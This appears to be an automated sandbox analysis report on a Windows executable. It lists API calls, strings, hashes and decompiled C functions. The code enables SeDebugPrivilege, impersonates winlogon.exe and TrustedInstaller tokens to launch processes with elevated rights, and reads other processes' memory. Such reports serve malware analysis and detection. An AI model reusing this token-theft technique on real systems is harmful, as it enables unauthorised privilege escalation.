0x00408616
0x00408620
0x0040862a
0x00408632
0x00408633
0x00408638
0x0040864a
0x0040864f
0x00408651
0x00000000
0x0040854f
0x0040854f
0x00408550
0x00408556
0x00408556

APIs

Part of subcall function 0040313D: LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 0040315C
Part of subcall function 0040313D: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 0040316E
Part of subcall function 0040313D: FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00403182
Part of subcall function 0040313D: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 004031AD

SetErrorMode.KERNELBASE(00008001,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00408563
GetModuleHandleW.KERNEL32(00000000,0040A3C1,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 0040857C
EnumResourceTypesW.KERNEL32(00000000,?,00000002), ref: 00408583
swscanf.MSVCRT ref: 00408620
_wtoi.MSVCRT ref: 00408633

Strings

/Run, xrefs: 0040867F
, xrefs: 00408595
XA, xrefs: 004088E5
`oA, xrefs: 004088D0
SeDebugPrivilege, xrefs: 004085B3
%I64x, xrefs: 004085E7
/cfg, xrefs: 00408727
/savelangfile, xrefs: 004088A3

Memory Dump Source

Source File: 0000000B.00000002.765299498.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.765285312.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765314693.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765324867.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.765331164.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes_wtoiswscanf
String ID: $%I64x$/Run$/cfg$/savelangfile$SeDebugPrivilege$`oA$XA
API String ID: 3933224404-3784219877
Opcode ID: 09c11c85140e2dc0a2d539678250e4bdf5192368ee7cdfd4c31c34b131dbb70b
Instruction ID: 6a1ad454fb11d14b300c4ed281ce3bcdfe782ea4983c0409628bf6e0aeb57f2c
Opcode Fuzzy Hash: 09c11c85140e2dc0a2d539678250e4bdf5192368ee7cdfd4c31c34b131dbb70b
Instruction Fuzzy Hash: 7FA16F71508340DBD720EF65DD8599BB7E8FB88308F50493FF588A3292DB3899098F5A

Uniqueness

Uniqueness Score: -1.00%

Function 00401FE6, Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 243
processCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E00401FE6(void* __eax, void* __ecx, void* __edx, WCHAR* _a4, WCHAR* _a8, long _a12, void* _a16, WCHAR* _a20, struct _STARTUPINFOW* _a24, struct _PROCESS_INFORMATION* _a28) {
				int _v8;
				long _v12;
				wchar_t* _v16;
				void _v546;
				long _v548;
				void _v1074;
				char _v1076;
				void* __esi;
				long _t84;
				int _t87;
				wchar_t* _t88;
				int _t92;
				void* _t93;
				int _t94;
				int _t96;
				int _t99;
				int _t104;
				long _t105;
				int _t110;
				void** _t112;
				int _t113;
				intOrPtr _t131;
				wchar_t* _t132;
				int* _t148;
				wchar_t* _t149;
				int _t151;
				void* _t152;
				void* _t153;
				int _t154;
				void* _t155;
				long _t160;

				_t145 = __edx;
				_t152 = __ecx;
				_t131 =  *((intOrPtr*)(__eax + 0x44a8));
				_v12 = 0;
				if(_t131 != 4) {
					__eflags = _t131 - 5;
					if(_t131 != 5) {
						__eflags = _t131 - 9;
						if(__eflags != 0) {
							__eflags = _t131 - 8;
							if(_t131 != 8) {
								__eflags = _t131 - 6;
								if(_t131 != 6) {
									__eflags = _t131 - 7;
									if(_t131 != 7) {
										__eflags = CreateProcessW(_a4, _a8, 0, 0, 0, _a12, _a16, _a20, _a24, _a28);
									} else {
										_t132 = __eax + 0x46b6;
										_t148 = __eax + 0x48b6;
										__eflags =  *_t148;
										_v16 = _t132;
										_v8 = __eax + 0x4ab6;
										if( *_t148 == 0) {
											_t88 = wcschr(_t132, 0x40);
											__eflags = _t88;
											if(_t88 != 0) {
												_t148 = 0;
												__eflags = 0;
											}
										}
										_t153 = _t152 + 0x800;
										E0040289F(_t153);
										_t154 =  *(_t153 + 0xc);
										__eflags = _t154;
										if(_t154 == 0) {
											_t87 = 0;
											__eflags = 0;
										} else {
											_t87 =  *_t154(_v16, _t148, _v8, 1, _a4, _a8, _a12, _a16, _a20, _a24, _a28);
										}
										__eflags = _t87;
									}
									if(__eflags == 0) {
										_t84 = GetLastError();
										L43:
										_v12 = _t84;
									}
									goto L44;
								}
								__eflags = E00401D99(__eax + 0x44ac, __edx);
								if(__eflags == 0) {
									goto L44;
								}
								_t92 = E0040A46C(_t131, __eflags,  &_a28, _t90, _a4, _a8, _a12, _a20, _a24, _a28);
								__eflags = _t92;
								if(_t92 != 0) {
									goto L44;
								}
								_t84 = _a28;
								goto L43;
							}
							_t93 = OpenSCManagerW(0, L"ServicesActive", 0x35); // executed
							__eflags = _t93;
							if(_t93 != 0) {
								E00401306(_t93); // executed
							}
							_v8 = 0;
							_t94 = E00401F04(_t145, _t152); // executed
							__eflags = _t94;
							_v12 = _t94;
							if(__eflags == 0) {
								_t96 = E00401DF9(_t145, __eflags, _t152, L"TrustedInstaller.exe",  &_v8); // executed
								__eflags = _t96;
								_v12 = _t96;
								if(_t96 == 0) {
									_t99 = E004028ED(_t152 + 0x800, _v8, _a4, _a8, _a12, _a16, _a20, _a24, _a28);
									__eflags = _t99;
									if(_t99 == 0) {
										_v12 = GetLastError();
									}
									CloseHandle(_v8); // executed
								}
								RevertToSelf(); // executed
							}
							goto L44;
						}
						_t104 = E0040598B(__edx, __eflags, __eax + 0x46b6);
						__eflags = _t104;
						if(_t104 == 0) {
							goto L44;
						}
						_v8 = 0;
						_t105 = E00401E44(_t152, _t104,  &_v8);
						goto L14;
					}
					_t149 = __eax + 0x44ac;
					_t110 = wcslen(_t149);
					__eflags = _t110;
					if(_t110 <= 0) {
						goto L44;
					} else {
						_v8 = 0;
						__eflags = E00404EA9(_t149, _t110);
						_t112 =  &_v8;
						_push(_t112);
						_push(_t149);
						if(__eflags == 0) {
							_push(_t152);
							_t113 = E00401DF9(_t145, __eflags);
						} else {
							L0040B1F8();
							_push(_t112);
							_push(_t152);
							_t113 = E00401E44();
						}
						_v12 = _t113;
						__eflags = _t113;
						goto L15;
					}
				} else {
					_v548 = 0;
					memset( &_v546, 0, 0x208);
					_v1076 = 0;
					memset( &_v1074, 0, 0x208);
					E00404C3C( &_v548);
					 *((intOrPtr*)(_t155 + 0x18)) = L"winlogon.exe";
					_t151 = wcslen(??);
					_t10 = wcslen( &_v548) + 1; // 0x1
					_t159 = _t151 + _t10 - 0x104;
					if(_t151 + _t10 >= 0x104) {
						_v1076 = 0;
					} else {
						E00404BE4( &_v1076,  &_v548, L"winlogon.exe");
					}
					_v8 = 0;
					_t105 = E00401DF9(_t145, _t159, _t152,  &_v1076,  &_v8);
					L14:
					_t160 = _t105;
					_v12 = _t105;
					L15:
					if(_t160 == 0) {
						if(E004028ED(_t152 + 0x800, _v8, _a4, _a8, _a12, _a16, _a20, _a24, _a28) == 0) {
							_v12 = GetLastError();
						}
						CloseHandle(_v8);
					}
					L44:
					return _v12;
				}
			}

APIs

memset.MSVCRT ref: 0040201D
memset.MSVCRT ref: 00402035

Part of subcall function 00404C3C: GetSystemDirectoryW.KERNEL32(0041C6D0,00000104), ref: 00404C52
Part of subcall function 00404C3C: wcscpy.MSVCRT ref: 00404C62

wcslen.MSVCRT ref: 00402050
wcslen.MSVCRT ref: 0040205F
wcslen.MSVCRT ref: 004020B4
_wtoi.MSVCRT ref: 004020D7
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00000000), ref: 0040214B
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00000000), ref: 00402157
OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000035,?,?,00000000), ref: 00402173
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,TrustedInstaller.exe,?,?), ref: 004021D5
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,TrustedInstaller.exe,?,?), ref: 004021E1
RevertToSelf.KERNELBASE(?,TrustedInstaller.exe,?,?), ref: 004021E7

Part of subcall function 00404BE4: wcscpy.MSVCRT ref: 00404BEC
Part of subcall function 00404BE4: wcscat.MSVCRT ref: 00404BFB

Part of subcall function 0040598B: memset.MSVCRT ref: 004059B5
Part of subcall function 0040598B: _wcsicmp.MSVCRT ref: 004059FA
Part of subcall function 0040598B: wcschr.MSVCRT ref: 00405A0E
Part of subcall function 0040598B: _wcsicmp.MSVCRT ref: 00405A20
Part of subcall function 0040598B: OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,?,?,?,?,00000000), ref: 00405A36
Part of subcall function 0040598B: OpenProcessToken.ADVAPI32(00000000,00000002,?), ref: 00405A4C
Part of subcall function 0040598B: CloseHandle.KERNEL32(?), ref: 00405A5A
Part of subcall function 0040598B: CloseHandle.KERNEL32(00000000), ref: 00405A61

Part of subcall function 00401E44: OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,winlogon.exe,?,00000000,winlogon.exe,00000000), ref: 00401E5C
Part of subcall function 00401E44: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401ED8
Part of subcall function 00401E44: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401EEB

wcschr.MSVCRT ref: 00402259
CreateProcessW.KERNEL32 ref: 004022B8
GetLastError.KERNEL32(?,?,00000000), ref: 004022C2

Strings

TrustedInstaller.exe, xrefs: 0040219C
winlogon.exe, xrefs: 00402049, 00402076
ServicesActive, xrefs: 0040216D

Memory Dump Source

Source File: 0000000B.00000002.765299498.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.765285312.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765314693.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765324867.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.765331164.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseHandle$OpenProcess$ErrorLastmemsetwcslen$_wcsicmpwcschrwcscpy$CreateDirectoryManagerRevertSelfSystemToken_wtoiwcscat
String ID: ServicesActive$TrustedInstaller.exe$winlogon.exe
API String ID: 3201562063-2355939583
Opcode ID: 36f9f8526d762d4bf55260197473f7f83151b965ca01539aa69d60d29f45efaf
Instruction ID: ccbcfbde9fdc9ff515b0a1e4c69409fc0ea490cdea51ab3e51e2115b03466e24
Opcode Fuzzy Hash: 36f9f8526d762d4bf55260197473f7f83151b965ca01539aa69d60d29f45efaf
Instruction Fuzzy Hash: 02813A76800209EACF11AFE0CD899AE7BA9FF08308F10457AFA05B21D1D7798A549B59

Uniqueness

Uniqueness Score: -1.00%

Function 004095FD, Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 120
processlibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E004095FD(void* __edx, void* __eflags, intOrPtr _a4) {
				void* _v8;
				void* _v12;
				char _v16;
				char _v24;
				char _v32;
				char _v40;
				char _v48;
				intOrPtr _v52;
				char _v576;
				long _v580;
				intOrPtr _v1112;
				long _v1128;
				void _v1132;
				void* _v1136;
				void _v1658;
				char _v1660;
				void* __edi;
				void* __esi;
				void* _t41;
				int _t46;
				long _t49;
				void* _t50;
				intOrPtr* _t66;
				struct HINSTANCE__* _t68;
				void* _t71;
				void* _t83;
				void* _t84;
				void* _t85;

				_t78 = _a4;
				E004099D4(_a4 + 0x28);
				_t41 = CreateToolhelp32Snapshot(2, 0); // executed
				_v12 = _t41;
				memset( &_v1132, 0, 0x228);
				_t84 = _t83 + 0xc;
				_v1136 = 0x22c;
				Process32FirstW(_v12,  &_v1136); // executed
				while(1) {
					_t46 = Process32NextW(_v12,  &_v1136); // executed
					if(_t46 == 0) {
						break;
					}
					E004090AF( &_v580);
					_t49 = _v1128;
					_v580 = _t49;
					_v52 = _v1112;
					_t50 = OpenProcess(0x410, 0, _t49);
					_v8 = _t50;
					if(_t50 != 0) {
						L4:
						_v1660 = 0;
						memset( &_v1658, 0, 0x208);
						_t85 = _t84 + 0xc;
						E004098F9(_t78, _v8,  &_v1660);
						if(_v1660 != 0) {
							L10:
							E0040920A( &_v576,  &_v1660);
							E00409555(_v8,  &_v48,  &_v40,  &_v32,  &_v24); // executed
							_t84 = _t85 + 0x14;
							CloseHandle(_v8);
							_t78 = _a4;
							L11:
							E004099ED(_t78 + 0x28,  &_v580);
							continue;
						}
						_v16 = 0x104;
						if( *0x41c8e0 == 0) {
							_t68 = GetModuleHandleW(L"kernel32.dll");
							if(_t68 != 0) {
								 *0x41c8e0 = 1;
								 *0x41c8e4 = GetProcAddress(_t68, "QueryFullProcessImageNameW");
							}
						}
						_t66 =  *0x41c8e4;
						if(_t66 != 0) {
							 *_t66(_v8, 0,  &_v1660,  &_v16); // executed
						}
						goto L10;
					}
					if( *((intOrPtr*)(E00404BAF() + 4)) <= 5) {
						goto L11;
					}
					_t71 = OpenProcess(0x1000, 0, _v580);
					_v8 = _t71;
					if(_t71 == 0) {
						goto L11;
					}
					goto L4;
				}
				return CloseHandle(_v12);
			}

APIs

Part of subcall function 004099D4: free.MSVCRT(00000000,00409614,?,?,00000000), ref: 004099DB

CreateToolhelp32Snapshot.KERNEL32 ref: 00409619
memset.MSVCRT ref: 0040962E
Process32FirstW.KERNEL32(?,?), ref: 0040964A
OpenProcess.KERNEL32(00000410,00000000,?,?,?,00000000), ref: 00409681
OpenProcess.KERNEL32(00001000,00000000,?), ref: 004096A5
memset.MSVCRT ref: 004096C6
GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 004096FC
GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00409716
QueryFullProcessImageNameW.KERNELBASE(00000000,00000000,?,00000104,00000000,?), ref: 00409739
CloseHandle.KERNEL32(00000000,?,?,?,00000000,?), ref: 0040976A
Process32NextW.KERNEL32(?,0000022C), ref: 0040978C
CloseHandle.KERNEL32(?,?,0000022C,?,?,?,?,00000000,?), ref: 0040979C

Strings

QueryFullProcessImageNameW, xrefs: 00409706
kernel32.dll, xrefs: 004096F7

Memory Dump Source

Source File: 0000000B.00000002.765299498.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.765285312.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765314693.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765324867.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.765331164.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: HandleProcess$CloseOpenProcess32memset$AddressCreateFirstFullImageModuleNameNextProcQuerySnapshotToolhelp32free
String ID: QueryFullProcessImageNameW$kernel32.dll
API String ID: 239888749-1740548384
Opcode ID: 93ba788d12a5409cd6757bb7493d38e70eb600f2f73dc0c750eaff65fc83c0f1
Instruction ID: d99fb1acad5946e2155d0e2cb4f7ec9e68cfc0f9061ce230986eeb1e4b65db1d
Opcode Fuzzy Hash: 93ba788d12a5409cd6757bb7493d38e70eb600f2f73dc0c750eaff65fc83c0f1
Instruction Fuzzy Hash: 10413DB2900118EEDB10EFA0DCC5AEEB7B9EB44348F1041BAE609B3191D7359E85DF59

Uniqueness

Uniqueness Score: -1.00%

Function 00409921, Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 29
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409921(struct HINSTANCE__** __esi) {
				void* _t6;
				struct HINSTANCE__* _t7;
				_Unknown_base(*)()* _t12;
				CHAR* _t13;
				intOrPtr* _t17;

				if( *__esi == 0) {
					_t7 = E00405436(L"psapi.dll"); // executed
					 *_t17 = "GetModuleBaseNameW";
					 *__esi = _t7;
					__esi[1] = GetProcAddress(_t7, _t13);
					__esi[2] = GetProcAddress( *__esi, "EnumProcessModules");
					__esi[4] = GetProcAddress( *__esi, "GetModuleFileNameExW");
					__esi[5] = GetProcAddress( *__esi, "EnumProcesses");
					_t12 = GetProcAddress( *__esi, "GetModuleInformation");
					__esi[3] = _t12;
					return _t12;
				}
				return _t6;
			}

0x00409924
0x0040992c
0x00409937
0x0040993f
0x0040994a
0x00409956
0x00409962
0x0040996e
0x00409971
0x00409973
0x00000000
0x00409976
0x00409977

APIs

Part of subcall function 00405436: memset.MSVCRT ref: 00405456
Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492

GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00409941
GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 0040994D
GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00409959
GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00409965
GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00409971

Strings

GetModuleInformation, xrefs: 00409967
EnumProcesses, xrefs: 0040995B
psapi.dll, xrefs: 00409927
GetModuleFileNameExW, xrefs: 0040994F
GetModuleBaseNameW, xrefs: 00409937
EnumProcessModules, xrefs: 00409943

Memory Dump Source

Source File: 0000000B.00000002.765299498.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.765285312.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765314693.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765324867.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.765331164.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$LibraryLoad$memsetwcscat
String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
API String ID: 1529661771-70141382
Opcode ID: 5bb6ae9af13ee73b8e972736f9e45c56a416d8eed90bd4e1aed24245ad07e366
Instruction ID: 092d130926b261125bd3b69643a6c94717898c68ce40be050c227dd31faca138
Opcode Fuzzy Hash: 5bb6ae9af13ee73b8e972736f9e45c56a416d8eed90bd4e1aed24245ad07e366
Instruction Fuzzy Hash: C7F0D4B4D40704AECB306FB59C09E16BAE1EFA8700B614D3EE0C1A3290D7799044CF48

Uniqueness

Uniqueness Score: -1.00%

Function 0040B2C6, Relevance: 18.1, APIs: 12, Instructions: 134COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(00000000,0040C390,00000070), ref: 0040B2D5
__set_app_type.MSVCRT ref: 0040B334
__p__fmode.MSVCRT ref: 0040B349
__p__commode.MSVCRT ref: 0040B357
__setusermatherr.MSVCRT ref: 0040B383
_initterm.MSVCRT ref: 0040B399
__wgetmainargs.KERNELBASE ref: 0040B3BC
_initterm.MSVCRT ref: 0040B3CF
GetStartupInfoW.KERNEL32(?), ref: 0040B42C
GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 0040B452
exit.KERNELBASE ref: 0040B469
_cexit.MSVCRT ref: 0040B46F

Memory Dump Source

Source File: 0000000B.00000002.765299498.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.765285312.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765314693.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765324867.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.765331164.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
String ID:
API String ID: 2827331108-0
Opcode ID: 480d2f0d1e59e5c54fd79cbec4a7142595e90bf4a66800abf037708ca1cfab7b
Instruction ID: dde25c0b0dc41f5004a610fd87b0135bea3e3095e736c0cca49ec984ade2cc6a
Opcode Fuzzy Hash: 480d2f0d1e59e5c54fd79cbec4a7142595e90bf4a66800abf037708ca1cfab7b
Instruction Fuzzy Hash: 3D519E71C50604DBCB20AFA4D9889AD77B4FB04710F60823BE861B72D2D7394D82CB9D

Uniqueness

Uniqueness Score: -1.00%

Function 00401AC9, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 105
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E00401AC9(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, void* _a8, void* _a12, void* _a16) {
				long _v8;
				int _v12;
				intOrPtr _v16;
				int _v20;
				int _v24;
				char _v28;
				void _v538;
				char _v540;
				int _v548;
				char _v564;
				char _v22292;
				void* __edi;
				void* __esi;
				void* _t37;
				int _t43;
				int _t45;
				void* _t48;
				void* _t56;
				signed int _t57;
				long _t61;
				void* _t67;
				long _t69;
				void* _t70;
				void* _t72;
				void* _t74;
				void* _t76;

				_t67 = __edx;
				E0040B550(0x5714, __ecx);
				_t37 = OpenProcess(0x10, 0, _a16);
				_t82 = _t37;
				_a16 = _t37;
				if(_t37 == 0) {
					_t69 = GetLastError();
				} else {
					_t72 =  &_v22292;
					E0040171F(_t72, _t82);
					_v8 = 0;
					_t43 = ReadProcessMemory(_a16, _a8, _t72, 0x54f4,  &_v8); // executed
					if(_t43 == 0) {
						_t69 = GetLastError();
					} else {
						_t48 = E00405642( &_v564);
						_t74 = _v548;
						_t70 = _t48;
						_a12 = _t74;
						_v540 = 0;
						memset( &_v538, 0, 0x1fe);
						asm("cdq");
						_push(_t67);
						_push(_t74);
						_push(_t70);
						_push(L"%d  %I64x");
						_push(0xff);
						_push( &_v540);
						L0040B1EC();
						_v548 = 0;
						E004055D1( &_v540,  &_v564);
						_t16 = _t70 + 0xa; // 0xa
						_t68 = _t16;
						_v24 = 0;
						_v12 = 0;
						_v20 = 0;
						_v16 = 0x100;
						_v28 = 0;
						E0040559A( &_v28, _t16);
						_t76 = _v12;
						_t56 = 0x40c4e8;
						if(_t76 != 0) {
							_t56 = _t76;
						}
						_t26 = _t70 + 2; // 0x2
						_t66 = _t70 + _t26;
						_t57 = ReadProcessMemory(_a16, _a12, _t56, _t70 + _t26,  &_v8); // executed
						_t85 = _t76;
						if(_t76 == 0) {
							_t76 = 0x40c4e8;
						}
						E004055F9(_t57 | 0xffffffff,  &_v564, _t76);
						_t61 = E004022D5(_t66, _t68, _t85, _a4,  &_v22292); // executed
						_t69 = _t61;
						E004055D1(_t61,  &_v28);
					}
					_t45 = FindCloseChangeNotification(_a16); // executed
					E004055D1(_t45,  &_v564);
				}
				return _t69;
			}

0x00401ac9
0x00401ad1
0x00401ae1
0x00401ae7
0x00401ae9
0x00401aec
0x00401c1b
0x00401af2
0x00401af2
0x00401af8
0x00401b0c
0x00401b12
0x00401b1a
0x00401bfd
0x00401b20
0x00401b26
0x00401b2b
0x00401b36
0x00401b40
0x00401b43
0x00401b4a
0x00401b54
0x00401b55
0x00401b56
0x00401b57
0x00401b58
0x00401b63
0x00401b68
0x00401b69
0x00401b77
0x00401b7d
0x00401b82
0x00401b82
0x00401b88
0x00401b8b
0x00401b8e
0x00401b91
0x00401b98
0x00401b9b
0x00401ba0
0x00401ba5
0x00401baa
0x00401bac
0x00401bac
0x00401bb2
0x00401bb2
0x00401bbe
0x00401bc4
0x00401bc6
0x00401bc8
0x00401bc8
0x00401bd7
0x00401be6
0x00401bee
0x00401bf0
0x00401bf0
0x00401c02
0x00401c0e
0x00401c0e
0x00401c23

APIs

OpenProcess.KERNEL32(00000010,00000000,0040864F,00000000,?,00000000,?,0040864F,?,?,?,00000000), ref: 00401AE1
ReadProcessMemory.KERNELBASE(0040864F,?,?,000054F4,00000000,?,0040864F,?,?,?,00000000), ref: 00401B12
memset.MSVCRT ref: 00401B4A
ReadProcessMemory.KERNELBASE(?,?,0040C4E8,00000002,00000000), ref: 00401BBE
_snwprintf.MSVCRT ref: 00401B69

Part of subcall function 004055D1: free.MSVCRT(?,00405843,00000000,?,00000000), ref: 004055DA

Part of subcall function 0040559A: free.MSVCRT(?,00000000,?,004057E1,00000000,?,00000000), ref: 004055AA

GetLastError.KERNEL32(?,0040864F,?,?,?,00000000), ref: 00401BF7
FindCloseChangeNotification.KERNELBASE(0040864F,?,0040864F,?,?,?,00000000), ref: 00401C02
GetLastError.KERNEL32(?,0040864F,?,?,?,00000000), ref: 00401C15

Strings

%d %I64x, xrefs: 00401B58

Memory Dump Source

Source File: 0000000B.00000002.765299498.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.765285312.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765314693.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765324867.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.765331164.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$ErrorLastMemoryReadfree$ChangeCloseFindNotificationOpen_snwprintfmemset
String ID: %d %I64x
API String ID: 1126726007-2565891505
Opcode ID: 0e39567e62c21eb8595adf136d2f138d4fded52a6135c8fa9db2ff03bc4b818b
Instruction ID: f77edfd559f5df329b7cfb23e65bd27f477c8a0de7d8607e39e5f26d9e4a317c
Opcode Fuzzy Hash: 0e39567e62c21eb8595adf136d2f138d4fded52a6135c8fa9db2ff03bc4b818b
Instruction Fuzzy Hash: FE312A72900519EBDB10EF959C859EE7779EF44304F40057AF504B3291DB349E45CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00401F04, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 74
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00401F04(void* __edx, intOrPtr _a4) {
				int _v8;
				void _v538;
				long _v540;
				void _v1066;
				char _v1068;
				long _t30;
				int _t33;
				int _t39;
				void* _t42;
				void* _t45;
				long _t49;

				_t45 = __edx;
				_v540 = 0;
				memset( &_v538, 0, 0x208);
				_v1068 = 0;
				memset( &_v1066, 0, 0x208);
				E00404C3C( &_v540);
				_t48 = L"winlogon.exe";
				_t39 = wcslen(L"winlogon.exe");
				_t8 = wcslen( &_v540) + 1; // 0x1
				_t53 = _t39 + _t8 - 0x104;
				_pop(_t42);
				if(_t39 + _t8 >= 0x104) {
					_v1068 = 0;
				} else {
					E00404BE4( &_v1068,  &_v540, _t48);
					_pop(_t42);
				}
				_v8 = 0;
				_t30 = E00401DF9(_t45, _t53, _a4,  &_v1068,  &_v8); // executed
				_t49 = _t30;
				_t54 = _t49;
				if(_t49 == 0) {
					E00408F48(_t42, _t54, L"SeImpersonatePrivilege"); // executed
					_t33 = ImpersonateLoggedOnUser(_v8); // executed
					if(_t33 == 0) {
						_t49 = GetLastError();
					}
					CloseHandle(_v8);
				}
				return _t49;
			}

APIs

memset.MSVCRT ref: 00401F27
memset.MSVCRT ref: 00401F3F

Part of subcall function 00404C3C: GetSystemDirectoryW.KERNEL32(0041C6D0,00000104), ref: 00404C52
Part of subcall function 00404C3C: wcscpy.MSVCRT ref: 00404C62

wcslen.MSVCRT ref: 00401F5A
wcslen.MSVCRT ref: 00401F69
ImpersonateLoggedOnUser.KERNELBASE(?,0040218D,?,?,?,?,?,?,?,00000000), ref: 00401FC2
GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00401FCC
CloseHandle.KERNEL32(?,?,?,?,?,?,00000000), ref: 00401FD7

Part of subcall function 00404BE4: wcscpy.MSVCRT ref: 00404BEC
Part of subcall function 00404BE4: wcscat.MSVCRT ref: 00404BFB

Strings

winlogon.exe, xrefs: 00401F54, 00401F59, 00401F80
SeImpersonatePrivilege, xrefs: 00401FB4

Memory Dump Source

Source File: 0000000B.00000002.765299498.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.765285312.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765314693.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765324867.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.765331164.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memsetwcscpywcslen$CloseDirectoryErrorHandleImpersonateLastLoggedSystemUserwcscat
String ID: SeImpersonatePrivilege$winlogon.exe
API String ID: 3867304300-2177360481
Opcode ID: b9815b26473cd7491ae288f5076cf4125b88922a7fa2441dfc3ee00491751d6f
Instruction ID: dcc5dec8953379ec1552ef046485534b93905478987a0ec3c51696e6dc85d708
Opcode Fuzzy Hash: b9815b26473cd7491ae288f5076cf4125b88922a7fa2441dfc3ee00491751d6f
Instruction Fuzzy Hash: 48214F72940118AACB20A795DC899DFB7BCDF54354F5001BBF608F2191EB345A848BAC

Uniqueness

Uniqueness Score: -1.00%

Function 00401306, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 38
serviceCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401306(void* _a4) {
				intOrPtr _v28;
				struct _SERVICE_STATUS _v32;
				void* _t5;
				int _t12;
				void* _t14;

				_t12 = 0; // executed
				_t5 = OpenServiceW(_a4, L"TrustedInstaller", 0x34); // executed
				_t14 = _t5;
				if(_t14 != 0) {
					if(QueryServiceStatus(_t14,  &_v32) != 0 && _v28 != 4) {
						_t12 = StartServiceW(_t14, 0, 0);
					}
					CloseServiceHandle(_t14);
				}
